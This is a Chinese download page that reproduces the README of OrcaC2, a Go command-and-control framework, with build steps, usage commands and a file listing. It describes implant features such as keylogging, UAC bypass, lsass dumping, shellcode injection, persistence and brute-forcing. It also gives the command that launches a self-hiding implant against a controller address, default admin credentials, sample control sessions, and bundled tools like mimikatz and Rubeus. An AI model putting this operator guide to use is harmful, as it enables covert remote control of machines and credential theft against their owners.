# OrcaC2
## 简介
`OrcaC2`是一款基于Websocket加密通信的多功能C&C框架,使用Golang实现。
由三部分组成:`Orca_Server`(服务端)、`Orca_Master`(控制端)、`Orca_Puppet`(被控端)。
<p align="center">
<img src="https://camo.githubusercontent.com/901feedaecaae6c639aa78d381759233dbfa9ccad2f67545e3471b3e41903382/68747470733a2f2f692e696d6775722e636f6d2f4f584d484a71692e6a7067" width=400 height=400 alt="ST"/>
</p>
<p align="center">
<img src="https://img.shields.io/github/license/Ptkatz/OrcaC2">
<img src="https://img.shields.io/github/v/release/Ptkatz/OrcaC2?color=brightgreen">
<img src="https://img.shields.io/github/go-mod/go-version/Ptkatz/OrcaC2?filename=Orca_Master%2Fgo.mod&color=6ad7e5">
</p>
<p align="center">
<img src="https://img.shields.io/github/stars/Ptkatz/OrcaC2?style=social">
🐳
<img src="https://img.shields.io/github/forks/Ptkatz/OrcaC2?style=social">
</p>
## 特性&功能
- Websocket通信,json格式传输数据,消息与数据采用AES-CBC加密+Base64编码
- 远程命令控制(增加命令备忘录功能,可以快速选择长命令)
- 文件上传/下载
- 屏幕截图(被控端为Windows系统)
- 远程屏幕控制(基于截图流,可控制键盘与鼠标)(被控端为Windows系统)
- 键盘记录
- 可查询被控端与被控主机基本信息(查询ip纯真库定位外网ip所对应的地理区域)
- 进程枚举/进程终止
- 可交互式终端(被控端为linux系统)
- 隐藏进程(在使用`ps`命令时显示进程名为进程列表中任意进程,并能够删除自身程序)(被控端为linux系统)
- 绕过UAC,获取管理员权限(被控端为Windows系统)
- CLR内存加载.Net程序集(被控端为Windows系统)
- 远程加载Powershell模块(被控端为Windows系统)
- 远程Shellcode、PE加载(支持的注入方式:CreateThread、CreateRemoteThread、RtlCreateUserThread、EtwpCreateEtwThread)(被控端为Windows系统)
- 正/反向代理、socks5正/反向代理(支持的协议:tcp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic)
- 多协程端口扫描(指纹识别端口信息)
- 多协程端口爆破(支持ftp、ssh、wmi、wmihash、smb、mssql、oracle、mysql、rdp、postgres、redis、memcached、mongodb、snmp)
- 远程ssh命令执行/文件上传/文件下载/ssh隧道
- 远程smb命令执行(无回显)/文件上传(通过rpc服务执行命令,类似wmiexec;通过ipc$上传文件,类似psexec)
- 使用MiniDumpWriteDump API 提取Lsass.dmp(被控端为Windows系统)
- CreateProcessWithPipe方式加载执行mimikatz、fscan(被控端为Windows系统);memfd方式加载执行fscan(被控端为linux系统)
- 持久化(计划任务、注册表启动项、服务)(被控端为Windows系统)
- 反弹meterpreter
## 安装
> 编译源码前,需要先在本地安装:go (>=1.18) 、gcc
### Windows系统下编译
下载并解压源码包后,直接运行`install.bat`文件即可。
### Linux系统下编译
```console
$ git clone https://github.com/Ptkatz/OrcaC2.git
$ cd OrcaC2
$ chmod +x install.sh
$ ./install.sh
```
> 若`install.sh`执行出错需将脚本中的命令一条条单独执行
## 使用
### Orca_Server端
存在配置文件(`./conf/app.ini`)与数据库文件(`./db/team.db`、`./qqwry.dat`)的情况下双击即可运行
参数说明:
- -c: 指定配置文件路径
- -au: 添加用户
- -du: 删除用户
- -mu: 修改用户的密码
### Orca_Puppet端
```console
Orca_Puppet.exe -host <Server端IP:端口> -debug -hide
```
参数说明:
- -host: 连接到Server端的地址,默认为127.0.0.1:6000
- -debug: 打开调试信息,默认为false
- -hide: 在Linux系统下可以伪造进程名,并删除自身程序文件
> Puppet端可在Master端上使用`generate/build`命令生成
### Orca_Master端
```console
Orca_Master.exe -u <用户名> -p <密码> -H <Server端IP:端口>
```
参数说明:
- -u | --username: 连接到Server端的用户名
- -p | --password: 连接到Server端的密码
- -H | --host: 连接到Server端的地址,默认为127.0.0.1:6000
- -c | --color: logo与命令提示符的颜色
> Server端数据库中默认的用户名和密码为 admin:123456
连接成功:
```console
C:\Users\blood\Desktop\OrcaC2\out\master>Orca_Master_win_x64.exe -u admin -p 123456
OrcaC2 Master 0.10.9
https://github.com/Ptkatz/OrcaC2
,;;;;;;,
{;g##7 9####h;;;;,,
{E777777779###########F7'
~` 7##########;
<:_ "##########h
-(:__ VG#3######,
~-=:=:=:__ -""d#####]
~--====_ {Q####]
{;;, ~-<=: l#####
9###. ~==: {Q###F'
g###h, =::` {a####7
;;;########gss;g####P7
7777777777G###7777'
;g77h; lE779; {;P79] g#,
l# #] lE;;gF #] gLJ#,
7N;;F7 l# "9h "7L;g] gF777#,
by: Ptkatz
2022/11/04 19:29:53 [*] login success
Orca[admin] » help
OrcaC2 command line tool
Commands:
clear clear the screen
exit exit the shell
generate, build generate puppet
help use 'help [command]' for command help
list, ls list hosts
port use port scan or port brute
powershell manage powershell script
proxy activate the proxy function
select select the host id waiting to be operated
ssh connects to target host over the SSH protocol
Orca[admin] » list
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| ID | HOSTNAME | IP | OS | ARCH | PRIVILEGE | PORT |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| 1 | PTKATZ/ptkatz | 10.10.10.10 | Microsoft Windows Server 2016 Datacenter | amd64 | user | 49704 |
| 2 | kali/root | 192.168.123.243 | Kali GNU/Linux Rolling | amd64 | root | 35872 |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
Orca[admin] » select 1
Orca[admin] → 10.10.10.10 » help
OrcaC2 command line tool
OrcaC2 command line tool
Commands:
assembly manage the CLR and execute .NET assemblies
back back to the main menu
clear clear the screen
close close the selected remote client
dump extract the lsass.dmp
exec execute shellcode or pe in memory
exit exit the shell
file execute file upload or download
generate, build generate puppet
getadmin bypass uac to get system administrator privileges
help use 'help [command]' for command help
info get basic information of remote host
keylogger get information entered by the remote host through the keyboard
list, ls list hosts
persist permission maintenance
plugin load plugin (mimikatz|fscan)
port use port scan or port brute
powershell manage powershell script
process, ps manage remote host processes
proxy activate the proxy function
reverse reverse shell
screen
没有合适的资源?快使用搜索试试~ 我知道了~
温馨提示
适合学习/练手、毕业设计、课程设计、期末/期中/大作业、工程实训、相关项目/竞赛学习等。 项目具有较高的学习借鉴价值,也可直接拿来修改复现。可以在这些基础上学习借鉴进行修改和扩展,实现其它功能。 可放心下载学习借鉴,你会有所收获。 可放心下载学习借鉴,你会有所收获。 可放心下载学习借鉴,你会有所收获。 —— 博主领域:嵌入式领域&人工智能&软件开发。 适合学习/练手、毕业设计、课程设计、期末/期中/大作业、工程实训、相关项目/竞赛学习等。 项目具有较高的学习借鉴价值,也可直接拿来修改复现。可以在这些基础上学习借鉴进行修改和扩展,实现其它功能。 可放心下载学习借鉴,你会有所收获。 # 注意 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担。 2. 部分字体以及插图等来自网络,若是侵权请联系删除。
资源推荐
资源详情
资源评论
收起资源包目录
OrcaC2是一款基于Websocket加密通信的多功能C&C框架,使用Golang实现 (768个子文件)
install.bat 1KB
gen.bat 25B
gen.bat 25B
gen.bat 25B
gen.bat 25B
gen.bat 25B
gen.bat 25B
gen.bat 25B
gen.bat 25B
1672374296.bin 23.99MB
fscan.bin 21.7MB
fscan.bin 19.08MB
mimikatz.bin 1.24MB
mimikatz.bin 995KB
stub.c 5KB
qqwry.dat 9.98MB
team.db 52KB
winPEAS.exe 1.87MB
Ladon.exe 1.77MB
SweetPotato.exe 762KB
Seatbelt.exe 539KB
SharpDecryptPwd.exe 522KB
Rubeus.exe 431KB
SharpKatz.exe 279KB
Certify.exe 171KB
SauronEye.exe 80KB
SharpCheckInfo.exe 61KB
SharpMiniDump.exe 58KB
SharpUp.exe 39KB
SharpBypassUAC.exe 25KB
SharpEDRChecker.exe 23KB
SharpAVKB.exe 17KB
SharpWifiGrabber.exe 10KB
fscan_386 4.37MB
fscan_amd64 5.16MB
sum_ref.go 74KB
sum_ref.go 74KB
cryptonight.go 63KB
cryptonight.go 63KB
groestl_gen.go 35KB
groestl_gen.go 35KB
wmiexec.go 33KB
wmiexec.go 33KB
wmiexec.go 33KB
blake256block.go 32KB
blake256block.go 32KB
dcom.go 28KB
dcom.go 28KB
dcom.go 28KB
cn_const.go 28KB
cn_const.go 28KB
input_linux.go 27KB
input_linux.go 27KB
service.go 25KB
service.go 25KB
createprocesswithpipe.go 24KB
proxy.pb.go 23KB
proxy.pb.go 23KB
common.go 22KB
common.go 22KB
framemgr.go 21KB
framemgr.go 21KB
client.go 21KB
client.go 21KB
constant.go 20KB
constant.go 20KB
ricmpconn.go 19KB
ricmpconn.go 19KB
cmdctrl.go 18KB
jh_gen.go 18KB
jh_gen.go 18KB
rudpconn.go 16KB
rudpconn.go 16KB
scmr.go 16KB
server.go 16KB
server.go 16KB
threefish1024_ref.go 15KB
threefish1024_ref.go 15KB
color.go 15KB
color.go 15KB
encoder.go 15KB
rhttpconn.go 14KB
rhttpconn.go 14KB
db.go 13KB
db.go 13KB
sum_r.go 13KB
sum_r.go 13KB
engine.go 12KB
engine.go 12KB
sshcmd.go 12KB
algorithm.go 12KB
algorithm.go 12KB
ntlmssp.go 11KB
jh.go 11KB
jh.go 11KB
smb.go 11KB
smb.go 11KB
proxycmd.go 10KB
groestl.go 10KB
groestl.go 10KB
共 768 条
- 1
- 2
- 3
- 4
- 5
- 6
- 8
资源评论
阿齐Archie
- 粉丝: 2w+
- 资源: 2452
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 基于Python+Mysql医疗机构药品及耗材信息管理系统带vue前后端分离毕业设计(含论文+开题报告+源码)
- springboot档案管理系统
- java-ssm+jsp影院管理系统实现源码(项目源码-说明文档)
- java-ssm+jsp影院电影购票系统实现源码(项目源码-说明文档)
- 学生自学网源码亲测可用
- java-ssm+jsp营业厅宽带办理系统实现源码(项目源码-说明文档)
- 基于MATLAB平台的图像去雾处理系统源代码+使用说明,配备一个人机交互GUI界面
- java-ssm+jsp艺诚美业信息管理系统实现源码(项目源码-说明文档)
- java-ssm+jsp医院资产管理系统实现源码(项目源码-说明文档)
- funny-word.exe
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功